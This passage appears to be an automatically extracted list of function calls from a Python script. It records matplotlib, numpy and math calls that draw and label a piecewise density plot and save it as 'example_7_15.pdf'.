'import matplotlib.pyplot as plt\n'), ((6182, 6213), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, xtl]', '"""k"""'], {}), "([T, T], [0, xtl], 'k')\n", (6190, 6213), True, 'import matplotlib.pyplot as plt\n'), ((6214, 6253), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, 2 * T]', '[0, xtl]', '"""k"""'], {}), "([2 * T, 2 * T], [0, xtl], 'k')\n", (6222, 6253), True, 'import matplotlib.pyplot as plt\n'), ((6250, 6289), 'matplotlib.pyplot.plot', 'plt.plot', (['[3 * T, 3 * T]', '[0, xtl]', '"""k"""'], {}), "([3 * T, 3 * T], [0, xtl], 'k')\n", (6258, 6289), True, 'import matplotlib.pyplot as plt\n'), ((6286, 6325), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / T, 1 / T]', '"""k"""'], {}), "([0, ytl], [1 / T, 1 / T], 'k')\n", (6294, 6325), True, 'import matplotlib.pyplot as plt\n'), ((6322, 6373), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / (2 * T), 1 / (2 * T)]', '"""k"""'], {}), "([0, ytl], [1 / (2 * T), 1 / (2 * T)], 'k')\n", (6330, 6373), True, 'import matplotlib.pyplot as plt\n'), ((6386, 6461), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (6394, 6461), True, 'import matplotlib.pyplot as plt\n'), ((6462, 6533), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (6470, 6533), True, 'import matplotlib.pyplot as plt\n'), ((6534, 6604), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (6542, 6604), True, 'import matplotlib.pyplot as plt\n'), ((6605, 6680), 'matplotlib.pyplot.text', 'plt.text', (['(2 * T)', 'xtm', '"""$2T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(2 * T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')\n", (6613, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6679, 6754), 'matplotlib.pyplot.text', 'plt.text', (['(3 * T)', 'xtm', '"""$3T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(3 * T, xtm, '$3T$', fontsize=fontsize, ha='center', va='baseline')\n", (6687, 6754), True, 'import matplotlib.pyplot as plt\n'), ((6763, 6851), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (6771, 6851), True, 'import matplotlib.pyplot as plt\n'), ((6844, 6939), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / (2 * T))', '"""$\\\\dfrac{1}{2T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / (2 * T), '$\\\\dfrac{1}{2T}$', fontsize=fontsize, ha=\n 'right', va='center')\n", (6852, 6939), True, 'import matplotlib.pyplot as plt\n'), ((7023, 7078), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0.28, 0.7)', 'frameon': '(False)', 'fontsize': '(12)'}), '(loc=(0.28, 0.7), frameon=False, fontsize=12)\n', (7033, 7078), True, 'import matplotlib.pyplot as plt\n'), ((7080, 7095), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (7088, 7095), True, 'import matplotlib.pyplot as plt\n'), ((7117, 7169), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""example_7_15.pdf"""'], {'bbox_inches': '"""tight"""'}), "('example_7_15.pdf', bbox_inches='tight')\n", (7128, 7169), True, 'import matplotlib.pyplot as plt\n'), ((7170, 7180), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7178, 7180), True, 'import matplotlib.pyplot as plt\n'), ((1596, 1611), 'math.sqrt', 'math.sqrt', (['var2'], {}), '(var2)\n', (1605, 1611), False, 'import math\n'), ((1636, 1651), 'math.sqrt', 'math.sqrt', (['var3'], {}), '(var3)\n', (1645, 1651), False, 'import math\n'), ((5652, 5677), 'numpy.polyval', 'np.polyval', (['[1, 0, 0]', 'xa'], {}), '([1, 0, 0], xa)\n', (5662, 5677), True, 'import numpy as np\n'), ((5772, 5812), 'numpy.polyval', 'np.polyval', (['[-2, 6 * T, -3 * T ** 2]', 'xa'], {}), '([-2, 6 * T, -3 * T ** 2], xa)\n', (5782, 5812), True, 'import numpy as np\n'), ((5887, 5926), 'numpy.polyval', 'np.polyval', (['[1, -6 * T, 9 * T ** 2]', 'xa'], {}), '([1, -6 * T, 9 * T ** 2], xa)\n', (5897, 5926), True, 'import numpy as np\n')]
|